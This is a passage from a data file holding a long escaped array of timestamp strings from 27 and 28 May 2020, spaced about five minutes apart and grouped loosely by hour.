11:22:47+00:00\",\"2020-05-28 11:38:29+00:00\",\"2020-05-28 11:03:11+00:00\",\"2020-05-28 11:17:41+00:00\",\"2020-05-28 11:42:38+00:00\",\"2020-05-28 11:52:56+00:00\",\"2020-05-28 11:27:57+00:00\",\"2020-05-28 11:33:09+00:00\",\"2020-05-28 11:47:43+00:00\",\"2020-05-27 19:07:51+00:00\",\"2020-05-27 19:23:09+00:00\",\"2020-05-27 19:32:57+00:00\",\"2020-05-27 19:47:56+00:00\",\"2020-05-27 19:53:16+00:00\",\"2020-05-27 19:03:29+00:00\",\"2020-05-27 19:13:31+00:00\",\"2020-05-27 19:17:40+00:00\",\"2020-05-27 19:38:16+00:00\",\"2020-05-27 19:27:35+00:00\",\"2020-05-27 19:42:33+00:00\",\"2020-05-28 14:12:38+00:00\",\"2020-05-28 14:27:54+00:00\",\"2020-05-28 14:43:07+00:00\",\"2020-05-28 14:47:31+00:00\",\"2020-05-28 14:02:50+00:00\",\"2020-05-28 14:08:16+00:00\",\"2020-05-28 14:18:09+00:00\",\"2020-05-28 14:22:31+00:00\",\"2020-05-28 14:33:19+00:00\",\"2020-05-28 14:52:58+00:00\",\"2020-05-28 14:37:40+00:00\",\"2020-05-28 13:18:02+00:00\",\"2020-05-28 13:43:12+00:00\",\"2020-05-28 13:02:46+00:00\",\"2020-05-28 13:08:10+00:00\",\"2020-05-28 13:23:30+00:00\",\"2020-05-28 13:27:50+00:00\",\"2020-05-28 13:52:55+00:00\",\"2020-05-28 13:12:33+00:00\",\"2020-05-28 13:33:27+00:00\",\"2020-05-28 13:37:40+00:00\",\"2020-05-28 13:47:30+00:00\",\"2020-05-28 10:47:47+00:00\",\"2020-05-28 10:07:35+00:00\",\"2020-05-28 10:12:45+00:00\",\"2020-05-28 10:17:53+00:00\",\"2020-05-28 10:33:18+00:00\",\"2020-05-28 10:42:41+00:00\",\"2020-05-28 10:52:55+00:00\",\"2020-05-28 10:03:30+00:00\",\"2020-05-28 10:22:59+00:00\",\"2020-05-28 10:28:10+00:00\",\"2020-05-28 10:38:31+00:00\",\"2020-05-28 09:02:34+00:00\",\"2020-05-28 09:12:50+00:00\",\"2020-05-28 09:23:15+00:00\",\"2020-05-28 09:32:32+00:00\",\"2020-05-28 09:43:01+00:00\",\"2020-05-28 09:48:03+00:00\",\"2020-05-28 09:07:46+00:00\",\"2020-05-28 09:37:43+00:00\",\"2020-05-28 09:18:03+00:00\",\"2020-05-28 09:28:23+00:00\",\"2020-05-28 09:53:14+00:00\",\"2020-05-28 15:18:02+00:00\",\"2020-05-28 15:22:29+00:00\",\"2020-05-28 15:27:52+00:00\",\"2020-05-28 15:33:23+00:00\",\"2020-05-28 15:08:17+00:00\",\"2020-05-28 15:12:42+00:00\",\"2020-05-28 15:43:17+00:00\",\"2020-05-28 15:47:30+00:00\",\"2020-05-28 15:02:49+00:00\",\"2020-05-28 15:37:38+00:00\",\"2020-05-28 15:52:59+00:00\",\"2020-05-28 17:08:17+00:00\",\"2020-05-28 17:17:54+00:00\",\"2020-05-28 17:33:21+00:00\",\"2020-05-28 17:12:35+00:00\",\"2020-05-28 17:27:48+00:00\",\"2020-05-28 16:57:35+00:00\",\"2020-05-28 17:02:49+00:00\",\"2020-05-28 17:23:27+00:00\",\"2020-05-28 16:02:45+00:00\",\"2020-05-28 16:08:08+00:00\",\"2020-05-28 16:12:33+00:00\",\"2020-05-28 16:18:02+00:00\",\"2020-05-28 16:23:13+00:00\",\"2020-05-28 16:48:09+00:00\",\"2020-05-28 16:28:19+00:00\",\"2020-05-28 16:33:30+00:00\",\"2020-05-28 16:37:42+00:00\",\"2020-05-28 16:42:54+00:00\",\"2020-05-28 16:53:27+00:00\",\"2020-05-28 01:03:09+00:00\",\"2020-05-28 01:43:02+00:00\",\"2020-05-28 01:53:19+00:00\",\"2020-05-28 01:07:34+00:00\",\"2020-05-28 01:12:57+00:00\",\"2020-05-28 01:28:17+00:00\",\"2020-05-28 01:37:46+00:00\",\"2020-05-28 01:18:23+00:00\",\"2020-05-28 01:22:48+00:00\",\"2020-05-28 01:32:30+00:00\",\"2020-05-28 01:48:10+00:00\",\"2020-05-27 21:03:06+00:00\",\"2020-05-27 21:13:31+00:00\",\"2020-05-27 21:22:44+00:00\",\"2020-05-27 21:28:01+00:00\",\"2020-05-27 21:52:44+00:00\",\"2020-05-27 21:17:36+00:00\",\"2020-05-27 21:33:05+00:00\",\"2020-05-27 21:38:18+00:00\",\"2020-05-27 21:43:29+00:00\",\"2020-05-27 21:47:34+00:00\",\"2020-05-27 21:08:16+00:00\",\"2020-05-28 05:32:37+00:00\",\"2020-05-28 05:37:55+00:00\",\"2020-05-28 05:02:58+00:00\",\"2020-05-28 05:17:54+00:00\",\"2020-05-28 05:23:22+00:00\",\"2020-05-28 05:27:36+00:00\",\"2020-05-28 05:43:14+00:00\",\"2020-05-28 05:52:36+00:00\",\"2020-05-28 05:08:29+00:00\",\"2020-05-28 05:12:40+00:00\",\"2020-05-28 05:48:28+00:00\",\"2020-05-27 23:28:03+00:00\",\"2020-05-27 23:48:15+00:00\",\"2020-05-27 23:07:45+00:00\",\"2020-05-27 23:13:07+00:00\",\"2020-05-27 23:18:21+00:00\",\"2020-05-27 23:42:42+00:00\",\"2020-05-27 23:03:26+00:00\",\"2020-05-27 23:22:46+00:00\",\"2020-05-27 23:33:14+00:00\",\"2020-05-27 23:38:26+00:00\",\"2020-05-27 23:52:31+00:00\",\"2020-05-28 06:18:01+00:00\",\"2020-05-28 06:23:29+00:00\",\"2020-05-28 06:38:12+00:00\",\"2020-05-28 06:42:30+00:00\",\"2020-05-28 06:02:56+00:00\",\"2020-05-28 06:12:31+00:00\",\"2020-05-28 06:27:48+00:00\",\"2020-05-28 06:32:56+00:00\",\"2020-05-28 06:47:47+00:00\",\"2020-05-28 06:08:15+00:00\",\"2020-05-28 06:53:06+00:00\",\"2020-05-28 08:38:00+00:00\",\"2020-05-28 08:52:45+00:00\",\"2020-05-28 08:03:17+00:00\",\"2020-05-28 08:07:34+00:00\",\"2020-05-28 08:12:53+00:00\",\"2020-05-28 08:18:17+00:00\",\"2020-05-28 08:22:32+00:00\",\"2020-05-28 08:27:39+00:00\",\"2020-05-28 08:32:50+00:00\",\"2020-05-28 08:48:23+00:00\",\"2020-05-28 08:43:17+00:00\",\"2020-05-28 03:07:41+00:00\",\"2020-05-28 03:12:53+00:00\",\"2020-05-28 03:37:39+00:00\",\"2020-05-28 03:18:02+00:00\",\"2020-05-28 03:23:10+00:00\",\"2020-05-28 03:42:46+00:00\",\"2020-05-28 03:53:05+00:00\",\"2020-05-28 03:02:33+00:00\",\"2020-05-28 03:28:19+00:00\",\"2020-05-28 03:33:29+00:00\",\"2020-05-28 03:48:01+00:00\",\"2020-05-28 00:03:15+00:00\",\"2020-05-28 00:23:28+00:00\",\"2020-05-28 00:27:45+00:00\",\"2020-05-28 00:38:13+00:00\",\"2020-05-28 00:53:14+00:00\",\"2020-05-28 00:12:48+00:00\",\"2020-05-28 00:33:00+00:00\",\"2020-05-28 00:43:29+00:00\",\"2020-05-28 00:47:57+00:00\",\"2020-05-28 00:07:37+00:00\",\"2020-05-28 00:18:07+00:00\",\"2020-05-27 22:08:07+00:00\",\"2020-05-27 22:13:22+00:00\",\"2020-05-27 22:27:43+00:00\",\"2020-05-27 22:42:34+00:00\",\"2020-05-27 22:48:08+00:00\",\"2020-05-27 22:52:35+00:00\",\"2020-05-27 22:02:58+00:00\",\"2020-05-27 22:18:26+00:00\",\"2020-05-27 22:22:36+00:00\",\"2020-05-27 22:32:56+00:00\",\"2020-05-27 22:38:14+00:00\",\"2020-05-28 07:08:22+00:00\",\"2020-05-28 07:12:46+00:00\",\"2020-05-28 07:37:47+00:00\",\"2020-05-28 07:48:25+00:00\",\"2020-05-28 07:28:05+00:00\",\"2020-05-28 07:43:04+00:00\",\"2020-05-28 07:02:52+00:00\",\"2020-05-28 07:18:16+00:00\",\"2020-05-28 07:22:37+00:00\",\"2020-05-28 07:32:29+00:00\",\"2020-05-28 07:52:36+00:00\",\"2020-05-27 18:03:30+00:00\",\"2020-05-27 18:07:49+00:00\",\"2020-05-27 18:13:24+00:00\",\"2020-05-27 18:27:32+00:00\",\"2020-05-27 18:42:37+00:00\",\"2020-05-27 18:48:08+00:00\",\"2020-05-27 18:52:34+00:00\",\"2020-05-27 18:23:07+00:00\",\"2020-05-27 18:17:46+00:00\",\"2020-05-27 18:32:58+00:00\",\"2020-05-27 18:38:30+00:00\",\"2020-05-27 20:03:02+00:00\",\"2020-05-27 20:08:22+00:00\",\"2020-05-27 20:22:52+00:00\",\"2020-05-27 20:28:01+00:00\",\"2020-05-27 20:38:24+00:00\",\"2020-05-27 20:52:46+00:00\",\"2020-05-27 20:17:43+00:00\",\"2020-05-27 20:12:37+00:00\",\"2020-05-27 20:33:14+00:00\",\"2020-05-27 20:43:28+00:00\",\"2020-05-27 20:47:36+00:00\",\"2020-05-28 00:38:14+00:00\",\"2020-05-28 00:48:23+00:00\",\"2020-05-28 00:58:26+00:00\",\"2020-05-28 01:18:46+00:00\",\"2020-05-28 01:23:44+00:00\",\"2020-05-28 00:43:17+00:00\",\"2020-05-28 01:08:34+00:00\",\"2020-05-28 01:33:50+00:00\",\"2020-05-28 00:53:26+00:00\",\"2020-05-28 01:03:37+00:00\",\"2020-05-28 01:13:36+00:00\",\"2020-05-28 01:28:50+00:00\",\"2020-05-27 19:48:46+00:00\",\"2020-05-27 19:53:49+00:00\",\"2020-05-27 20:03:57+00:00\",\"2020-05-27 20:09:04+00:00\",\"2020-05-27 20:14:07+00:00\",\"2020-05-27 19:38:39+00:00\",\"2020-05-27 19:43:43+00:00\",\"2020-05-27 19:58:54+00:00\",\"2020-05-27 20:18:10+00:00\",\"2020-05-27 20:23:13+00:00\",\"2020-05-27 20:28:18+00:00\",\"2020-05-27 20:33:23+00:00\",\"2020-05-28 08:48:28+00:00\",\"2020-05-28 09:08:40+00:00\",\"2020-05-28 09:18:47+00:00\",\"2020-05-28 09:28:55+00:00\",\"2020-05-28 08:43:20+00:00\",\"2020-05-28 09:13:43+00:00\",\"2020-05-28 08:53:28+00:00\",\"2020-05-28 08:58:31+00:00\",\"2020-05-28 09:03:36+00:00\",\"2020-05-28 09:23:50+00:00\",\"2020-05-28 09:34:03+00:00\",\"2020-05-28 14:13:38+00:00\",\"2020-05-28 14:23:47+00:00\",\"2020-05-28 13:43:16+00:00\",\"2020-05-28 13:48:18+00:00\",\"2020-05-28 13:53:30+00:00\",\"2020-05-28 13:58:29+00:00\",\"2020-05-28 14:03:32+00:00\",\"2020-05-28 14:08:35+00:00\",\"2020-05-28 14:18:44+00:00\",\"2020-05-28 14:28:55+00:00\",\"2020-05-28 14:33:55+00:00\",\"2020-05-28 07:48:40+00:00\",\"2020-05-28 08:03:53+00:00\",\"2020-05-28 08:19:07+00:00\",\"2020-05-28 08:28:10+00:00\",\"2020-05-28 07:43:37+00:00\",\"2020-05-28 07:53:45+00:00\",\"2020-05-28 08:08:57+00:00\",\"2020-05-28 08:33:16+00:00\",\"2020-05-28 07:38:37+00:00\",\"2020-05-28 07:58:48+00:00\",\"2020-05-28 08:14:04+00:00\",\"2020-05-28 08:23:08+00:00\",\"2020-05-28 04:53:19+00:00\",\"2020-05-28 05:13:32+00:00\",\"2020-05-28 05:18:35+00:00\",\"2020-05-28 05:23:40+00:00\",\"2020-05-28 05:33:46+00:00\",\"2020-05-28 04:58:23+00:00\",\"2020-05-28 05:03:28+00:00\",\"2020-05-28 05:08:29+00:00\",\"2020-05-28 05:28:43+00:00\",\"2020-05-28 04:43:13+00:00\",\"2020-05-28 04:48:15+00:00\",\"2020-05-28 11:48:39+00:00\",\"2020-05-28 12:19:05+00:00\",\"2020-05-28 11:53:41+00:00\",\"2020-05-28 12:08:56+00:00\",\"2020-05-28 12:23:14+00:00\",\"2020-05-28 12:28:19+00:00\",\"2020-05-28 11:43:36+00:00\",\"2020-05-28 11:58:45+00:00\",\"2020-05-28 12:03:52+00:00\",\"2020-05-28 12:13:59+00:00\",\"2020-05-28 12:33:20+00:00\",\"2020-05-27 22:38:13+00:00\",\"2020-05-27 23:28:23+00:00\",\"2020-05-27 22:43:17+00:00\",\"2020-05-27 22:58:43+00:00\",\"2020-05-27 23:03:53+00:00\",\"2020-05-27 23:08:59+00:00\",\"2020-05-27 23:13:07+00:00\",\"2020-05-27 23:33:30+00:00\",\"2020-05-27 22:48:22+00:00\",\"2020-05-27 22:53:34+00:00\",\"2020-05-27 23:18:17+00:00\",\"2020-05-27 23:23:19+00:00\",\"2020-05-27 20:38:27+00:00\",\"2020-05-27 21:03:48+00:00\",\"2020-05-27 21:33:22+00:00\",\"2020-05-27 20:43:27+00:00\",\"2020-05-27 20:53:36+00:00\",\"2020-05-27 21:08:51+00:00\",\"2020-05-27 21:23:10+00:00\",\"2020-05-27 20:48:33+00:00\",\"2020-05-27 20:58:40+00:00\",\"2020-05-27 21:13:59+00:00\",\"2020-05-27 21:19:05+00:00\",\"2020-05-27 21:28:15+00:00\",\"2020-05-28 05:38:47+00:00\",\"2020-05-28 05:43:52+00:00\",\"2020-05-28 05:48:55+00:00\",\"2020-05-28 05:54:01+00:00\",\"2020-05-28 06:08:11+00:00\",\"2020-05-28 06:33:29+00:00\",\"2020-05-28 05:59:05+00:00\",\"2020-05-28 06:03:09+00:00\",\"2020-05-28 06:13:15+00:00\",\"2020-05-28 06:18:20+00:00\",\"2020-05-28 06:23:22+00:00\",\"2020-05-28 06:28:31+00:00\",\"2020-05-28 15:43:15+00:00\",\"2020-05-28 15:58:26+00:00\",\"2020-05-28 16:13:47+00:00\",\"2020-05-28 16:24:04+00:00\",\"2020-05-28 16:33:09+00:00\",\"2020-05-28 15:48:17+00:00\",\"2020-05-28 16:29:00+00:00\",\"2020-05-28 15:53:29+00:00\",\"2020-05-28 16:03:29+00:00\",\"2020-05-28 16:08:38+00:00\",\"2020-05-28 16:18:54+00:00\",\"2020-05-28 16:48:19+00:00\",\"2020-05-28 16:53:26+00:00\",\"2020-05-28 17:08:49+00:00\",\"2020-05-28 17:13:53+00:00\",\"2020-05-28 17:19:03+00:00\",\"2020-05-28 17:28:17+00:00\",\"2020-05-28 16:43:16+00:00\",\"2020-05-28 16:58:37+00:00\",\"2020-05-28 17:23:10+00:00\",\"2020-05-28 17:33:25+00:00\",\"2020-05-28 17:03:45+00:00\",\"2020-05-28 01:44:02+00:00\",\"2020-05-28 02:18:24+00:00\",\"2020-05-28 02:28:30+00:00\",\"2020-05-28 02:33:38+00:00\",\"2020-05-28 01:38:58+00:00\",\"2020-05-28 01:49:04+00:00\",\"2020-05-28 01:54:05+00:00\",\"2020-05-28 02:08:17+00:00\",\"2020-05-28 02:23:28+00:00\",\"2020-05-28 01:58:12+00:00\",\"2020-05-28 02:03:16+00:00\",\"2020-05-28 02:13:20+00:00\",\"2020-05-28 12:43:30+00:00\",\"2020-05-28 12:58:44+00:00\",\"2020-05-28 13:03:53+00:00\",\"2020-05-28 13:08:53+00:00\",\"2020-05-28 13:23:59+00:00\",\"2020-05-28 13:29:01+00:00\",\"2020-05-28 12:48:32+00:00\",\"2020-05-28 12:53:36+00:00\",\"2020-05-28 13:13:55+00:00\",\"2020-05-28 13:18:58+00:00\",\"2020-05-28 13:34:06+00:00\",\"2020-05-27 21:38:30+00:00\",\"2020-05-27 21:53:44+00:00\",\"2020-05-27 22:18:57+00:00\",\"2020-05-27 21:43:30+00:00\",\"2020-05-27 21:48:38+00:00\",\"2020-05-27 21:58:45+00:00\",\"2020-05-27 22:08:50+00:00\",\"2020-05-27 22:24:05+00:00\",\"2020-05-27 22:03:48+00:00\",\"2020-05-27 22:13:56+00:00\",\"2020-05-27 22:29:07+00:00\",\"2020-05-27 22:33:10+00:00\",\"2020-05-28 06:58:49+00:00\",\"2020-05-28 07:03:58+00:00\",\"2020-05-28 07:13:10+00:00\",\"2020-05-28 07:18:20+00:00\",\"2020-05-28 07:23:20+00:00\",\"2020-05-28 06:38:37+00:00\",\"2020-05-28 06:43:39+00:00\",\"2020-05-28 06:53:44+00:00\",\"2020-05-28 07:09:11+00:00\",\"2020-05-28 06:48:39+00:00\",\"2020-05-28 07:28:24+00:00\",\"2020-05-28 07:33:26+00:00\",\"2020-05-28 03:43:22+00:00\",\"2020-05-28 03:53:28+00:00\",\"2020-05-28 04:24:01+00:00\",\"2020-05-28 03:48:21+00:00\",\"2020-05-28 04:03:36+00:00\",\"2020-05-28 04:08:44+00:00\",\"2020-05-28 04:18:57+00:00\",\"2020-05-28 04:29:07+00:00\",\"2020-05-28 03:38:17+00:00\",\"2020-05-28 03:58:32+00:00\",\"2020-05-28 04:13:54+00:00\",\"2020-05-28 04:34:06+00:00\",\"2020-05-28 09:53:10+00:00\",\"2020-05-28 09:58:24+00:00\",\"2020-05-28 10:13:29+00:00\",\"2020-05-28 10:33:43+00:00\",\"2020-05-28 09:39:03+00:00\",\"2020-05-28 09:44:04+00:00\",\"2020-05-28 10:03:28+00:00\",\"2020-05-28 10:28:50+00:00\",\"2020-05-28 09:48:07+00:00\",\"2020-05-28 10:08:27+00:00\",\"2020-05-28 10:18:33+00:00\",\"2020-05-28 10:23:40+00:00\",\"2020-05-28 15:03:24+00:00\",\"2020-05-28 15:08:33+00:00\",\"2020-05-28 15:23:52+00:00\",\"2020-05-28 15:28:59+00:00\",\"2020-05-28 15:34:07+00:00\",\"2020-05-28 14:43:08+00:00\",\"2020-05-28 14:48:14+00:00\",\"2020-05-28 14:58:22+00:00\",\"2020-05-28 15:18:43+00:00\",\"2020-05-28 14:53:14+00:00\",\"2020-05-28 15:13:42+00:00\",\"2020-05-27 18:03:27+00:00\",\"2020-05-27 18:18:37+00:00\",\"2020-05-27 18:33:47+00:00\",\"2020-05-27 18:13:35+00:00\",\"2020-05-27 18:23:38+00:00\",\"2020-05-27 18:28:44+00:00\",\"2020-05-27 17:58:23+00:00\",\"2020-05-27 18:08:31+00:00\",\"2020-05-27 18:38:56+00:00\",\"2020-05-27 18:43:55+00:00\",\"2020-05-27 18:53:59+00:00\",\"2020-05-27 19:03:07+00:00\",\"2020-05-27 18:49:00+00:00\",\"2020-05-27 19:23:26+00:00\",\"2020-05-27 19:28:31+00:00\",\"2020-05-27 19:33:39+00:00\",\"2020-05-27 18:59:05+00:00\",\"2020-05-27 19:08:12+00:00\",\"2020-05-27 19:13:17+00:00\",\"2020-05-27 19:18:19+00:00\",\"2020-05-27 23:38:32+00:00\",\"2020-05-27 23:43:33+00:00\",\"2020-05-27 23:53:43+00:00\",\"2020-05-28 00:08:53+00:00\",\"2020-05-28 00:24:02+00:00\",\"2020-05-27 23:48:39+00:00\",\"2020-05-27 23:58:47+00:00\",\"2020-05-28 00:03:50+00:00\",\"2020-05-28 00:13:58+00:00\",\"2020-05-28 00:19:01+00:00\",\"2020-05-28 00:29:09+00:00\",\"2020-05-28 00:33:13+00:00\",\"2020-05-28 02:48:45+00:00\",\"2020-05-28 02:53:49+00:00\",\"2020-05-28 02:58:55+00:00\",\"2020-05-28 03:19:05+00:00\",\"2020-05-28 03:24:08+00:00\",\"2020-05-28 03:28:09+00:00\",\"2020-05-28 02:38:38+00:00\",\"2020-05-28 03:09:03+00:00\",\"2020-05-28 03:33:17+00:00\",\"2020-05-28 02:43:41+00:00\",\"2020-05-28 03:03:54+00:00\",\"2020-05-28 03:14:01+00:00\",\"2020-05-28 11:13:14+00:00\",\"2020-05-28 11:33:23+00:00\",\"2020-05-28 10:48:53+00:00\",\"2020-05-28 11:04:07+00:00\",\"2020-05-28 11:18:14+00:00\",\"2020-05-28 11:23:17+00:00\",\"2020-05-28 11:28:23+00:00\",\"2020-05-28 10:43:50+00:00\",\"2020-05-28 10:54:03+00:00\",\"2020-05-28 10:59:03+00:00\",\"2020-05-28 11:08:07+00:00\",\"2020-05-28 14:49:37+00:00\",\"2020-05-28 14:54:51+00:00\",\"2020-05-28 14:59:46+00:00\",\"2020-05-28 15:05:09+00:00\",\"2020-05-28 15:10:18+00:00\",\"2020-05-28 15:14:40+00:00\",\"2020-05-28 15:20:14+00:00\",\"2020-05-28 15:24:51+00:00\",\"2020-05-28 15:29:39+00:00\",\"2020-05-28 15:34:44+00:00\",\"2020-05-28 15:39:50+00:00\",\"2020-05-27 22:44:06+00:00\",\"2020-05-27 22:49:33+00:00\",\"2020-05-27 22:54:14+00:00\",\"2020-05-27 22:59:27+00:00\",\"2020-05-27 23:04:17+00:00\",\"2020-05-27 23:09:22+00:00\",\"2020-05-27 23:14:14+00:00\",\"2020-05-27 23:19:26+00:00\",\"2020-05-27 23:24:14+00:00\",\"2020-05-27 23:29:22+00:00\",\"2020-05-27 23:34:05+00:00\",\"2020-05-28 00:44:16+00:00\",\"2020-05-28 00:49:13+00:00\",\"2020-05-28 00:54:44+00:00\",\"2020-05-28 00:59:28+00:00\",\"2020-05-28 01:04:18+00:00\",\"2020-05-28 01:09:30+00:00\",\"2020-05-28 01:14:28+00:00\",\"2020-05-28 01:19:17+00:00\",\"2020-05-28 01:24:21+00:00\",\"2020-05-28 01:29:59+00:00\",\"2020-05-28 01:34:20+00:00\",\"2020-05-27 18:40:19+00:00\",\"2020-05-27 18:45:04+00:00\",\"2020-05-27 18:50:03+00:00\",\"2020-05-27 18:54:56+00:00\",\"2020-05-27 19:00:02+00:00\",\"2020-05-27 19:04:53+00:00\",\"2020-05-27 19:10:33+00:00\",\"2020-05-27 19:14:43+00:00\",\"2020-05-27 19:19:45+00:00\",\"2020-05-27 19:24:53+00:00\",\"2020-05-27 19:29:45+00:00\",\"2020-05-27 19:34:43+00:00\",\"2020-05-28 04:45:01+00:00\",\"2020-05-28 04:50:24+00:00\",\"2020-05-28 04:54:48+00:00\",\"2020-05-28 04:59:43+00:00\",\"2020-05-28 05:04:49+00:00\",\"2020-05-28 05:09:54+00:00\",\"2020-05-28 05:14:50+00:00\",\"2020-05-28 05:19:53+00:00\",\"2020-05-28 05:25:30+00:00\",\"2020-05-28 05:30:34+00:00\",\"2020-05-28 05:35:09+00:00\",\"2020-05-27 19:39:45+00:00\",\"2020-05-27 19:45:27+00:00\",\"2020-05-27 19:49:55+00:00\",\"2020-05-27 19:54:44+00:00\",\"2020-05-27 19:59:58+00:00\",\"2020-05-27 20:05:06+00:00\",\"2020-05-27 20:09:45+00:00\",\"2020-05-27 20:15:12+00:00\",\"2020-05-27 20:19:59+00:00\",\"2020-05-27 20:25:28+00:00\",\"2020-05-27 20:29:46+00:00\",\"2020-05-27 20:35:32+00:00\",\"2020-05-27 21:44:28+00:00\",\"2020-05-27 21:49:09+00:00\",\"2020-05-27 21:54:15+00:00\",\"2020-05-27 21:59:18+00:00\",\"2020-05-27 22:04:00+00:00\",\"2020-05-27 22:09:21+00:00\",\"2020-05-27 22:14:01+00:00\",\"2020-05-27 22:19:21+00:00\",\"2020-05-27 22:24:05+00:00\",\"2020-05-27 22:28:58+00:00\",\"2020-05-27 22:34:33+00:00\",\"2020-05-27 20:40:05+00:00\",\"2020-05-27 20:45:16+00:00\",\"2020-05-27 20:50:33+00:00\",\"2020-05-27 20:55:33+00:00\",\"2020-05-27 21:00:12+00:00\",\"2020-05-27 21:05:30+00:00\",\"2020-05-27 21:09:49+00:00\",\"2020-05-27 21:15:29+00:00\",\"2020-05-27 21:19:13+00:00\",\"2020-05-27 21:23:49+00:00\",\"2020-05-27 21:29:08+00:00\",\"2020-05-27 21:33:58+00:00\",\"2020-05-28 05:44:56+00:00\",\"2020-05-28 05:50:31+00:00\",\"2020-05-28 05:54:51+00:00\",\"2020-05-28 06:00:17+00:00\",\"2020-05-28 06:05:22+00:00\",\"2020-05-28 06:09:57+00:00\",\"2020-05-28 06:14:54+00:00\",\"2020-05-28 06:20:08+00:00\",\"2020-05-28 06:25:10+00:00\",\"2020-05-28 06:30:29+00:00\",\"2020-05-28 15:49:46+00:00\",\"2020-05-28 15:55:18+00:00\",\"2020-05-28 16:00:16+00:00\",\"2020-05-28 16:04:41+00:00\",\"2020-05-28 16:09:54+00:00\",\"2020-05-28 16:14:45+00:00\",\"2020-05-28 16:20:03+00:00\",\"2020-05-28 16:24:52+00:00\",\"2020-05-28 16:29:58+00:00\",\"2020-05-28 16:34:44+00:00\",\"2020-05-28 16:40:15+00:00\",\"2020-05-28 12:49:59+00:00\",\"2020-05-28 12:54:37+00:00\",\"2020-05-28 12:59:45+00:00\",\"2020-05-28 13:04:45+00:00\",\"2020-05-28 13:09:55+00:00\",\"2020-05-28 13:14:28+00:00\",\"2020-05-28 13:19:38+00:00\",\"2020-05-28 13:24:48+00:00\",\"2020-05-28 13:30:09+00:00\",\"2020-05-28 13:35:08+00:00\",\"2020-05-28 13:39:35+00:00\",\"2020-05-28 08:49:21+00:00\",\"2020-05-28 08:54:08+00:00\",\"2020-05-28 08:59:14+00:00\",\"2020-05-28 09:04:18+00:00\",\"2020-05-28 09:09:18+00:00\",\"2020-05-28 09:14:21+00:00\",\"2020-05-28 09:19:30+00:00\",\"2020-05-28 09:24:06+00:00\",\"2020-05-28 09:29:27+00:00\",\"2020-05-28 09:34:49+00:00\",\"2020-05-28 09:39:15+00:00\",\"2020-05-28 09:44:43+00:00\",\"2020-05-28 07:26:18+00:00\",\"2020-05-28 07:28:21+00:00\",\"2020-05-28 07:33:56+00:00\",\"2020-05-28 07:39:34+00:00\",\"2020-05-28 07:44:37+00:00\",\"2020-05-28 02:44:26+00:00\",\"2020-05-28 02:50:11+00:00\",\"2020-05-28 02:54:38+00:00\",\"2020-05-28 02:59:35+00:00\",\"2020-05-28 03:04:30+00:00\",\"2020-05-28 03:09:46+00:00\",\"2020-05-28 03:14:42+00:00\",\"2020-05-28 03:19:29+00:00\",\"2020-05-28 03:24:36+00:00\",\"2020-05-28 03:30:09+00:00\",\"2020-05-28 03:34:50+00:00\",\"2020-05-28 10:49:35+00:00\",\"2020-05-28 10:54:19+00:00\",\"2020-05-28 10:59:28+00:00\",\"2020-05-28 11:05:35+00:00\",\"2020-05-28 11:09:22+00:00\",\"2020-05-28 11:14:39+00:00\",\"2020-05-28 11:19:16+00:00\",\"2020-05-28 11:24:27+00:00\",\"2020-05-28 11:29:33+00:00\",\"2020-05-28 11:34:44+00:00\",\"2020-05-28 11:39:20+00:00\",\"2020-05-28 11:44:45+00:00\",\"2020-05-28 01:44:44+00:00\",\"2020-05-28 01:49:43+00:00\",\"2020-05-28 01:54:34+00:00\",\"2020-05-28 01:59:30+00:00\",\"2020-05-28 02:04:27+00:00\",\"2020-05-28 02:10:03+00:00\",\"2020-05-28 02:14:29+00:00\",\"2020-05-28 02:19:52+00:00\",\"2020-05-28 02:24:23+00:00\",\"2020-05-28 02:29:26+00:00\",\"2020-05-28 02:34:25+00:00\",\"2020-05-28 16:49:51+00:00\",\"2020-05-28 16:55:17+00:00\",\"2020-05-28 16:59:56+00:00\",\"2020-05-28 17:04:46+00:00\",\"2020-05-28 17:10:37+00:00\",\"2020-05-28 17:14:57+00:00\",\"2020-05-28 17:20:07+00:00\",\"2020-05-28 17:24:47+00:00\",\"2020-05-28 17:30:21+00:00\",\"2020-05-28 17:35:05+00:00\",\"2020-05-28 03:45:22+00:00\",\"2020-05-28 03:49:58+00:00\",\"2020-05-28 03:55:06+00:00\",\"2020-05-28 04:00:15+00:00\",\"2020-05-28 04:05:27+00:00\",\"2020-05-28 04:09:42+00:00\",\"2020-05-28 04:15:08+00:00\",\"2020-05-28 04:19:58+00:00\",\"2020-05-28 04:25:10+00:00\",\"2020-05-28 04:29:40+00:00\",\"2020-05-28 04:35:02+00:00\",\"2020-05-28 09:49:58+00:00\",\"2020-05-28 09:54:19+00:00\",\"2020-05-28 09:59:25+00:00\",\"2020-05-28 10:04:48+00:00\",\"2020-05-28 10:09:24+00:00\",\"2020-05-28 10:14:36+00:00\",\"2020-05-28 10:19:28+00:00\",\"2020-05-28 10:24:47+00:00\",\"2020-05-28 10:29:37+00:00\",\"2020-05-28 10:34:21+00:00\",\"2020-05-28 10:39:22+00:00\",\"2020-05-28 10:44:37+00:00\",\"2020-05-28 11:50:07+00:00\",\"2020-05-28 11:55:01+00:00\",\"2020-05-28 11:59:37+00:00\",\"2020-05-28 12:04:38+00:00\",\"2020-05-28 12:09:47+00:00\",\"2020-05-28 12:14:25+00:00\",\"2020-05-28 12:19:35+00:00\",\"2020-05-28 12:26:16+00:00\",\"2020-05-28 12:29:55+00:00\",\"2020-05-28 12:34:36+00:00\",\"2020-05-28 12:39:51+00:00\",\"2020-05-27 23:44:25+00:00\",\"2020-05-27 23:49:10+00:00\",\"2020-05-27 23:54:52+00:00\",\"2020-05-27 23:59:32+00:00\",\"2020-05-28 00:04:50+00:00\",\"2020-05-28 00:09:18+00:00\",\"2020-05-28 00:14:14+00:00\",\"2020-05-28 00:19:06+00:00\",\"2020-05-28 00:24:36+00:00\",\"2020-05-28 00:29:10+00:00\",\"2020-05-28 00:34:17+00:00\",\"2020-05-28 07:49:44+00:00\",\"2020-05-28 07:54:32+00:00\",\"2020-05-28 07:59:28+00:00\",\"2020-05-28 08:04:30+00:00\",\"2020-05-28 08:09:04+00:00\",\"2020-05-28 08:14:05+00:00\",\"2020-05-28 08:19:10+00:00\",\"2020-05-28 08:24:36+00:00\",\"2020-05-28 08:29:20+00:00\",\"2020-05-28 08:34:28+00:00\",\"2020-05-28 08:39:03+00:00\",\"2020-05-28 08:44:21+00:00\",\"2020-05-27 18:00:27+00:00\",\"2020-05-27 18:04:39+00:00\",\"2020-05-27 18:09:42+00:00\",\"2020-05-27 18:14:41+00:00\",\"2020-05-27 18:19:42+00:00\",\"2020-05-27 18:24:57+00:00\",\"2020-05-27 18:30:14+00:00\",\"2020-05-27 18:34:57+00:00\",\"2020-05-28 